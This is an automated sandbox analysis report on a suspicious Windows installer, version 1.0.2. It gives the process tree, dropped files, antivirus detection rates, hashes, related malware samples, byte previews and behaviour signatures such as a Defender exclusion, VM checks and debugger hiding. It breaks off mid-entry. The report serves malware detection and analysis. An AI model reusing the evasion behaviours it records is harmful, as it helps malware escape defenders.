Employee Names | Virtual Private Server | Local Accounts | 1 Native API | Login Hook | 1 DLL Side-Loading | 1 Access Token Manipulation | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 111 Process Injection | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 2 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | 3 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | 45 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1580228
Sample: #U5b89#U88c5#U52a9#U624b1.0.2.exe
Startdate: 24/12/2024
Architecture: WINDOWS
Score: 92

Signatures attached to the start node:
  • Multi AV Scanner detection for dropped file
  • Multi AV Scanner detection for submitted file
  • Found driver which could be used to inject code into processes
  • 2 other signatures

Process tree (dropped files and signatures are listed under the process they belong to):

Start
  #U5b89#U88c5#U52a9#U624b1.0.2.exe
    dropped: C:\...\#U5b89#U88c5#U52a9#U624b1.0.2.tmp (PE32)
    #U5b89#U88c5#U52a9#U624b1.0.2.tmp
      dropped: C:\Users\user\AppData\Local\...\update.vac (PE32)
      dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
      signature: Adds a directory exclusion to Windows Defender
      #U5b89#U88c5#U52a9#U624b1.0.2.exe
        dropped: C:\...\#U5b89#U88c5#U52a9#U624b1.0.2.tmp (PE32)
        #U5b89#U88c5#U52a9#U624b1.0.2.tmp
          dropped: C:\Users\user\AppData\Local\...\update.vac (PE32)
          dropped: C:\Program Files (x86)\Windows NT\hrsw.vbc (PE32)
          dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
          dropped: C:\Program Files (x86)\Windows NT\7zr.exe (PE32)
          signature: Query firmware table information (likely to detect VMs)
          signature: Protects its processes via BreakOnTermination flag
          signature: Hides threads from debuggers
          signature: Contains functionality to hide a thread from the debugger
          7zr.exe
            dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+)
            conhost.exe
          7zr.exe
            conhost.exe
          cmd.exe
            sc.exe
      powershell.exe
        signature: Loading BitLocker PowerShell Module
        conhost.exe
        WmiPrvSE.exe
    conhost.exe
  cmd.exe
    sc.exe
      conhost.exe
        Conhost.exe
  cmd.exe
    sc.exe
      conhost.exe
  30 other processes
    sc.exe
      conhost.exe
    sc.exe
      conhost.exe
    sc.exe
      conhost.exe
    26 other processes
      conhost.exe
      25 other processes

Submitted file:

Source                                  Detection  Scanner        Label  Link
#U5b89#U88c5#U52a9#U624b1.0.2.exe       7%         Virustotal            Browse
#U5b89#U88c5#U52a9#U624b1.0.2.exe       0%         ReversingLabs

Dropped files:

Source                                                                  Detection  Scanner        Label  Link
C:\Program Files (x86)\Windows NT\7zr.exe                               0%         ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe                               0%         Virustotal            Browse
C:\Program Files (x86)\Windows NT\hrsw.vbc                              15%        Virustotal            Browse
C:\Program Files (x86)\Windows NT\tProtect.dll                          9%         ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll                          6%         Virustotal            Browse
C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\_isetup\_setup64.tmp      0%         ReversingLabs
C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\_isetup\_setup64.tmp      0%         Virustotal            Browse
C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\_isetup\_setup64.tmp      0%         ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
Domains:

Name: default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
IP: 217.20.58.99
Active: true
Malicious: false
Antivirus Detection: none
Reputation: high

URLs:

Name: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe
Malicious: false
Reputation: high

Name: https://www.remobjects.com/ps
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1684520948.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1683832146.0000000003710000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000000.1685903370.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.1775195665.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr
Malicious: false
Reputation: high

Name: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1684520948.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1683832146.0000000003710000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000000.1685903370.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.1775195665.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr
Malicious: false
Reputation: high
          No contacted IP infos
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1580228
          Start date and time:2024-12-24 05:00:48 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 10m 11s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:110
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Critical Process Termination
          Sample name:#U5b89#U88c5#U52a9#U624b1.0.2.exe
          renamed because original name is a hash value
          Original Sample Name:1.0.2.exe
          Detection:MAL
          Classification:mal92.evad.winEXE@134/33@0/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 77%
          • Number of executed functions: 52
          • Number of non-executed functions: 81
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Exclude process from analysis (whitelisted): SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.85.23.206
          • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
          • Not all processes were analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          No simulations
          No context
Match: default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

Associated Sample Name / URL                                                    SHA 256   Detection  Threat Name            Link    Context
AxoPac.exe                                                                      Get hash  malicious  LummaC                 Browse  217.20.58.100
[External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.eml          Get hash  malicious  Unknown                Browse  217.20.58.99
PLEASE SIGN THIS DOCUMENT - Reference number(s) 0598190575 DPR.msg              Get hash  malicious  Unknown                Browse  217.20.58.101
lKin1m7Pf2.lnk                                                                  Get hash  malicious  Unknown                Browse  217.20.58.99
fKdiT1D1dk.exe                                                                  Get hash  malicious  RHADAMANTHYS           Browse  217.20.58.100
uDTW3VjJJT.exe                                                                  Get hash  malicious  LummaC, Stealc         Browse  217.20.58.99
data.exe                                                                        Get hash  malicious  Unknown                Browse  217.20.58.99
4hSuRTwnWJ.dll                                                                  Get hash  malicious  Unknown                Browse  217.20.58.100
YinLHGpoX4.vbs                                                                  Get hash  malicious  GuLoader, RHADAMANTHYS Browse  217.20.58.99
gCXzb0K8Ci.ps1                                                                  Get hash  malicious  Unknown                Browse  217.20.58.99
          No context
          No context
Match: C:\Program Files (x86)\Windows NT\7zr.exe

Associated Sample Name / URL            SHA 256   Detection  Threat Name  Link    Context
#U5b89#U88c5#U52a9#U624b1.0.3.exe       Get hash  malicious  Unknown      Browse
#U5b89#U88c5#U52a9#U624b1.0.1.exe       Get hash  malicious  Unknown      Browse
#U5b89#U88c5#U52a9#U624b1.0.2.exe       Get hash  malicious  Unknown      Browse
#U5b89#U88c5#U52a9#U624b_2.0.8.exe      Get hash  malicious  Unknown      Browse
#U5b89#U88c5#U52a9#U624b1.0.2.exe       Get hash  malicious  Unknown      Browse
#U5b89#U88c5#U52a9#U624b_2.0.8.exe      Get hash  malicious  Unknown      Browse
#U5b89#U88c5#U52a9#U624b_2.0.6.exe      Get hash  malicious  Unknown      Browse
#U5b89#U88c5#U52a9#U624b_2.0.6.exe      Get hash  malicious  Unknown      Browse
#U5b89#U88c5#U52a9#U624b_2.0.7.exe      Get hash  malicious  Unknown      Browse
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):831200
                            Entropy (8bit):6.671005303304742
                            Encrypted:false
                            SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                            MD5:84DC4B92D860E8AEA55D12B1E87EA108
                            SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                            SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                            SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Joe Sandbox View:
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1298992
                            Entropy (8bit):7.999859712098508
                            Encrypted:true
                            SSDEEP:24576:Jm7V4SAXqwNu//CopofXJGkYYguHpFGnJ3jm7biUd163/etGJir:CFAXY3CwofZYAnGnJfW163/eP
                            MD5:6FFA62F827FB9CCD24B82A7B93CD0B92
                            SHA1:26BD8C8B9703ED628D5BFFC7F4F05C0434DDD192
                            SHA-256:3CF4EA11F2EE6642695B5D7F5373ECCFB381A4FE7DC79F796342BF214BBB7FE7
                            SHA-512:C32F17A21A0AFB4ABA501C3D0DAC3DD31610195C4B0CE96B16B0EE579EB9A1768BCE8B6D725AC06A0CBE21A1C4DA22D0FC37AEEE094CAAFF857D0A77C3C578E8
                            Malicious:false
                            Preview:.@S....Xt. ,-.................T.Y....Z#...R....h.x..ch...2..z#..f.......j..].<2Y...[G.. .........|Wo...h8V.N..0=`....K.hRw_..3....}"%.f.....%......w5..LxVd...i...6.D.8.p.{..M.|.:Z'j.1.T.;.:!.3.(".qJ.......vm.8.<....G.O.p,,.lE.w...0D.......\..T..6...M?k.."..}....).4..#....hMT.F..&...)h.y.......*.X0..f%......)..z.j..jO\..4...~.C../......"h...q......E!.........B..I)..c..............Nu....4J.....).f...x.VYL ...%.......?sznR.5..eiM.N<".L...#Wi..Qs...V/.p.v...g.....:..,.mZ....xL:.I5eHV-.N....).R~...\c....{..#k.n~Y.................#{............;.I....i.p...a..\n..z=....J.?...".%...F.;.o.2.Z./.Xn..9.......9......r......`q.f.....vt.*....2....cP{..^...Wr.].8.Y..b..iui.=w.;iC.b.~./Ad3lD....R.[Y...o.M......>X.....I....2,.1...tVhB......H#ek.R.._-|...}.~.`(..#5.....=.QS...:..m.hk,W.M.!..p.t....B..`7..<}..;.4.g.A.r...:.F..&.!..LN...oyn~..0.,.o0......x.'..^}.~:X.+.G.;.L.....<.........8.\.(...../.Su.....L(..3\&.:.....po6P5.w.9..5.=....T..ck.wU.e.d..
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Virustotal, Detection: 15%, Browse
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1298992
                            Entropy (8bit):7.999859712098508
                            Encrypted:true
                            SSDEEP:24576:Jm7V4SAXqwNu//CopofXJGkYYguHpFGnJ3jm7biUd163/etGJir:CFAXY3CwofZYAnGnJfW163/eP
                            MD5:6FFA62F827FB9CCD24B82A7B93CD0B92
                            SHA1:26BD8C8B9703ED628D5BFFC7F4F05C0434DDD192
                            SHA-256:3CF4EA11F2EE6642695B5D7F5373ECCFB381A4FE7DC79F796342BF214BBB7FE7
                            SHA-512:C32F17A21A0AFB4ABA501C3D0DAC3DD31610195C4B0CE96B16B0EE579EB9A1768BCE8B6D725AC06A0CBE21A1C4DA22D0FC37AEEE094CAAFF857D0A77C3C578E8
                            Malicious:false
                            Preview:.@S....Xt. ,-.................T.Y....Z#...R....h.x..ch...2..z#..f.......j..].<2Y...[G.. .........|Wo...h8V.N..0=`....K.hRw_..3....}"%.f.....%......w5..LxVd...i...6.D.8.p.{..M.|.:Z'j.1.T.;.:!.3.(".qJ.......vm.8.<....G.O.p,,.lE.w...0D.......\..T..6...M?k.."..}....).4..#....hMT.F..&...)h.y.......*.X0..f%......)..z.j..jO\..4...~.C../......"h...q......E!.........B..I)..c..............Nu....4J.....).f...x.VYL ...%.......?sznR.5..eiM.N<".L...#Wi..Qs...V/.p.v...g.....:..,.mZ....xL:.I5eHV-.N....).R~...\c....{..#k.n~Y.................#{............;.I....i.p...a..\n..z=....J.?...".%...F.;.o.2.Z./.Xn..9.......9......r......`q.f.....vt.*....2....cP{..^...Wr.].8.Y..b..iui.=w.;iC.b.~./Ad3lD....R.[Y...o.M......>X.....I....2,.1...tVhB......H#ek.R.._-|...}.~.`(..#5.....=.QS...:..m.hk,W.M.!..p.t....B..`7..<}..;.4.g.A.r...:.F..&.!..LN...oyn~..0.,.o0......x.'..^}.~:X.+.G.;.L.....<.........8.\.(...../.Su.....L(..3\&.:.....po6P5.w.9..5.=....T..ck.wU.e.d..
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1048934
                            Entropy (8bit):7.999810584659191
                            Encrypted:true
                            SSDEEP:24576:zzo7JKPe56MvMbFP0ERf6gc0mgl2Cz8fyDPPK+tNTbotfxeeW:zzo1KPepUP/f6Z0NlZsyjy+tZb4AeW
                            MD5:D6E21035CF34180A78FD0609ACFA9285
                            SHA1:721C65391A0C2E18987202864D1CB08F9545AA3D
                            SHA-256:D1B45E42ABAEB7560E8E186277974790F97E141CAFCC3FF920460E542F9CD1AF
                            SHA-512:566E9571B984CDBF2BC9E51101894BB0BF61E857C03D90888AB9EAF93B3BDB7368F274D21893281A4603FE6390CA66EE201E022D25DADBA804D3523DFDE69D6C
                            Malicious:false
                            Preview:.hi..2...%....H.k...J.o,ET$+V..<..p.O.c._...R.?R.zmf."<...U....Fh....g......,....4-....*-.........qC...r..%..4...{...h..gm\"..er.T....H.l{=.<l...}...e....u.wT..bf....$...Z......j#..?...7..k..m#..3..A*.....<9T.n...I...YY..2l..)O..r.+.f.G...y......"K..c.7ug..].........d&.$.....u.............V..c.J>U.@..>2....5i...f.RcVP.:..........~.......q)t....P.V.l.h2.E..;.qE3p.6.....dn..4...o.q...........p....&.H.. .Z~..K......T.|.c*Q.5.tfStC........~..AX.J,.....i.T)lY..S.z..sL._........].......evYr...M.[v..6+.r.. H.m.k4...x*w..X....Q.n~.......+y../z5..'.._$.{<&.dZu.z?SHeIn~V..m.....4.v.,Z.5.}..^.D/h..6.R.-8.q.O.d...a....h..B......(..Dm`*.).xCW.".......V.D.db......Y.7..r..6.*.0;$....4......[.`..8.b.....wb.H1...S....c...f/......j..NX..h1.....R.O.dm.P..g..)..KT.....x.y...H.|...1..k%...v.S...u,.6.bn~...^.....AS[..u...q.Q.G4x.KB..q....&.$...o.H.i.MoX.w.*..*..........K....@..SF.*[...u..H...{?.Z.x>.u.......&3.?......s...Px9.._;..-U....4.F...d*.%T..e..
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56530
                            Entropy (8bit):7.996546775800433
                            Encrypted:true
                            SSDEEP:1536:7DuRHPS0dk/fZO6X5QmoeCyxK0cpwjK5AOWB7xQFFiZNrkM:Uq7fHac0TpwXOQRB
                            MD5:21BFB225D2E39810D9EE735B3060E744
                            SHA1:7D199DF76261C313FDF7AC01337E6A1408AA8512
                            SHA-256:501CD7704495EA6DE9D1954D57B3AE8A64113D74DB6987989846B932EBA7777A
                            SHA-512:CEFCF390A30478EB458B40D3452B1C7113CD2639F25BC2DC5810213AE9A40EAA7476AEA59A929FFF76CF413EC9D6E74B061F8D25182EAE50BBD098AE81C29EAE
                            Malicious:false
                            Preview:.@S.......t| ..............[i.0..W...l.w...BCD.....k...%......F-.f.D.2VW..f..a$..E.B..Q.WD'..S..m.oX.`y-(/.=..f.>.W..}. .Oeb...9.S.,J...r...0.<=..b..e....H...|zT5qns....S..O.'B..w.'.>D-..q.VM .X..^.....m....Husi...f.{B..2..B..^...z..Y.1.R.s.....{...+.i..TdC...r.h.._`...KqE..E....}....Fn.+...~..ct.m..u.........aF.L...Q..]@}....<x..X...W.p.....Q{3...^..cU;...#.Zm,..Z.N]9#V....G..).>...4....q..UFI.A...../k.Bc.{..:B#..Rk.D,.:.W.h...VV6.>....w...?..,...4d....m6\.:l.....9.....}..*....F.c..L...]....zz?......N..*.4..A)t..Q.......1...8.s`!2;.'..,M...o.......W...:..v+7...D.Z..J..g?J.,,...G1.6<....>_.......}h%.h}......mw.L.NS.GsE..:.S..[*....*z.W.y..3U..g....b=,...iYx.y.U................mtag..6+.....l.. ... ......D.Y.4-..g...:..\9...K...%w.{...1.4..m..4F.}y..%b.......4MoN...%0r.S12.W.Q-.Z.kC/..i...%.zw...p...8;...}.#.z..M...K5.M....>7...=...z...o....7...v&...+.A..{.B...N........;.@........R....X....1....XW....j. R.....\.1..z..<X.d..*l.w+.3|..=.. ..b;-.s
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56530
                            Entropy (8bit):7.996546775800435
                            Encrypted:true
                            SSDEEP:768:OM8fzupqIW2Fco+I2nUZp3apRhoFQevWPlE8O89ZtYTL/FPk06HoP+Y6FY1ykws7:qaIb2FcoRGUZplFGwgEqHo2dkRvospf9
                            MD5:65C9E51864D8DD52F2E31A2DE279E0E3
                            SHA1:85C553B3704B09DEFB2C64C0112FD9097A48C9E8
                            SHA-256:568D2F12C6BB93BE575029FC3995FD3BC6C23A109EAE1808CCB1ED8FF4EE45DF
                            SHA-512:CC6B145E56F10DC8B5E61E5742AABD9902ACF21A3F241A3F6DFA490B4279C36C1ED04B6355A35CA3C22F95530CAF607C59A31513F65C56ADA9B9CF156B351B42
                            Malicious:false
                            Preview:7z..'...f(..........2.........6.~K..V...........#.*..0iIN._..r7.............b....|./.'*.}....5..l}G.W.........X@/...,.td...V...mT,.-.3.../.;mTH....8#i....v....A6<......-.h.X.}..k.)G.U..{'.w...q....U[%...ehB....JV4.C.........;.a..pF...}...?3.g..._:...{t..:...b.w.1.9...!...d..A.....'".u..|?..`...~...t|?.4........C..-.v.J..jK.Y;..u..U+`.a$....3H.....RA.v....k9.M....5e..;..R...]^4.<MP].|G...;.0..h..4....|J..7_...G..O...........{.[4.E..@.......#.s..1..f.yq&.z..Q.-&.B.....c.r.|..Yf[.^.4......_.o...).O..l...$..m].O[3.]}..$.....1.@...m;.R;c.=.ae.........t}.x.^.p.Eh.....:-SK.....?..?..:4..g..........%0..9..K...iy...D6..J.....F.33.<p.R`c....6.cSF.....n...z#Gkc.v'4..M.DG>>....L.....8.5.+..S.....'.l.2.....V)h.=e.P..]....[.-.`z8.g..2/...m..I..(..|..8..E<}....Y@p..>...|.e..&U.y...0x.I..C.6...Vry.dT...&+......J.`j,..........}s..;...>...BH. .P.0..nj'...+..G.06&.m.0#.zFw.4.OQ).Yd!..`...LN\z.n3..h..{.S9.S.|.uk.%9.%..Q.x...........^.i...d..Jt....
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255975
                            Encrypted:true
                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                            Malicious:false
                            Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                            Process:C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56546
                            Entropy (8bit):7.996966859255979
                            Encrypted:true
                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                            MD5:4CB8B7E557C80FC7B014133AB834A042
                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                            Malicious:false
                            Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):31890
                            Entropy (8bit):7.99402458740637
                            Encrypted:true
                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                            MD5:8622FC7228777F64A47BD6C61478ADD9
                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
